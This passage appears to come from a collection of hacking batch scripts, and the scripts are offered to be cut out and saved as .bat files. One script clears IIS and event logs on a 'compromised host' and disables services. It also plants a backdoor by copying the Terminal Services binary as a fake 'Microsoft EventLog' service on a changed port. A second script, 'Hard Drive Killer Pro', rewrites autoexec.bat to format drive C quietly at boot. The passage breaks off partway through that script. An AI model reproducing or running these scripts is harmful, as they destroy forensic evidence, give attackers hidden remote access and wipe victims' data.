@echo Windows Registry Editor Version 5.00 >patch.dll
@echo [HKEY_LOCAL_MACHINE//SYSTEM//CurrentControlSet//Services//lanmanserver//parameters] >>patch.dll
@echo "AutoShareServer"=dword:00000000 >>patch.dll
@echo "AutoShareWks"=dword:00000000 >>patch.dll
@REM [Disable the default shares]
@echo [HKEY_LOCAL_MACHINE//SYSTEM//CurrentControlSet//Control//Lsa] >>patch.dll
@echo "restrictanonymous"=dword:00000001 >>patch.dll
@REM [Disable anonymous logon]
@echo [HKEY_LOCAL_MACHINE//SYSTEM//CurrentControlSet//Services//NetBT//Parameters] >>patch.dll
@echo "SMBDeviceEnabled"=dword:00000000 >>patch.dll
@REM [Disable file access and print sharing]
@echo [HKEY_LOCAL_MACHINE//SYSTEM//CurrentControlSet//Services//@REMoteRegistry] >>patch.dll
@echo "Start"=dword:00000004 >>patch.dll
@echo [HKEY_LOCAL_MACHINE//SYSTEM//CurrentControlSet//Services//Schedule] >>patch.dll
@echo "Start"=dword:00000004 >>patch.dll
@echo [HKEY_LOCAL_MACHINE//SOFTWARE//Microsoft//Windows NT//CurrentVersion//Winlogon] >>patch.dll
@echo "ShutdownWithoutLogon"="0" >>patch.dll
@REM [Disable shutdown before logon]
@echo "DontDisplayLastUserName"="1" >>patch.dll
@REM [Do not display the name of the last logged-on user]
@regedit /s patch.dll

------------------------ cut here then save as .bat or .cmd file ---------------------------

The following commands clear all logs on the compromised host, disable some dangerous services, and modify the compromised host's Terminal Service to leave a backdoor.

@regedit /s patch.dll
@net stop w3svc
@net stop event log
@del c://winnt//system32//logfiles//w3svc1//*.* /f /q
@del c://winnt//system32//logfiles//w3svc2//*.* /f /q
@del c://winnt//system32//config//*.event /f /q
@del c://winnt//system32dtclog//*.* /f /q
@del c://winnt//*.txt /f /q
@del c://winnt//*.log /f /q
@net start w3svc
@net start event log
@rem [Delete the logs]
@net stop lanmanserver /y
@net stop Schedule /y
@net stop RemoteRegistry /y
@del patch.dll
@echo The server has been patched,Have fun.
@del patch.bat
@REM [Disable some dangerous services.]
@echo [HKEY_LOCAL_MACHINE//SYSTEM//CurrentControlSet//Control//Terminal Server//WinStations//RDP-Tcp] >>patch.dll
@echo "PortNumber"=dword:00002010 >>patch.dll
@echo [HKEY_LOCAL_MACHINE//SYSTEM//CurrentControlSet//Control//Terminal Server//Wds//rdpwd//Tds//tcp >>patch.dll
@echo "PortNumber"=dword:00002012 >>patch.dll
@echo [HKEY_LOCAL_MACHINE//SYSTEM//CurrentControlSet//Services//TermDD] >>patch.dll
@echo "Start"=dword:00000002 >>patch.dll
@echo [HKEY_LOCAL_MACHINE//SYSTEM//CurrentControlSet//Services//SecuService] >>patch.dll
@echo "Start"=dword:00000002 >>patch.dll
@echo "ErrorControl"=dword:00000001 >>patch.dll
@echo "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,// >>patch.dll
@echo 74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,// >>patch.dll
@echo 00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00 >>patch.dll
@echo "ObjectName"="LocalSystem" >>patch.dll
@echo "Type"=dword:00000010 >>patch.dll
@echo "Description"="Keep record of the program and windows message。" >>patch.dll
@echo "DisplayName"="Microsoft EventLog" >>patch.dll
@echo [HKEY_LOCAL_MACHINE//SYSTEM//CurrentControlSet//Services//termservice] >>patch.dll
@echo "Start"=dword:00000004 >>patch.dll
@copy c://winnt//system32//termsrv.exe c://winnt//system32//eventlog.exe
@REM [Change the 3389 connection: the port becomes 8210 (00002012 in hexadecimal) and the name becomes Microsoft EventLog, leaving a backdoor]

3. Hard Drive Killer Pro Version 4.0 (Taking batch scripting to this level is really no easy feat.)

------------------------ cut here then save as .bat or .cmd file ---------------------------

@echo off
rem This program is dedecated to a very special person that does not want to be named.
:start
cls
echo PLEASE WAIT WHILE PROGRAM LOADS . . .
call attrib -r -h c://autoexec.bat >nul
echo @echo off >c://autoexec.bat
echo call format c: /q /u /autoSample >nul >>c://autoexec.bat
call attrib +r +h c://autoexec.bat >nul
rem Drive checking and assigning the valid drives to the drive variable.
set drive=
set alldrive=c d e f g h i j k l m n o p q r s t u v w x y z
rem code insertion for Drive Checking takes place here.
rem drivechk.bat is the file name under the root directory.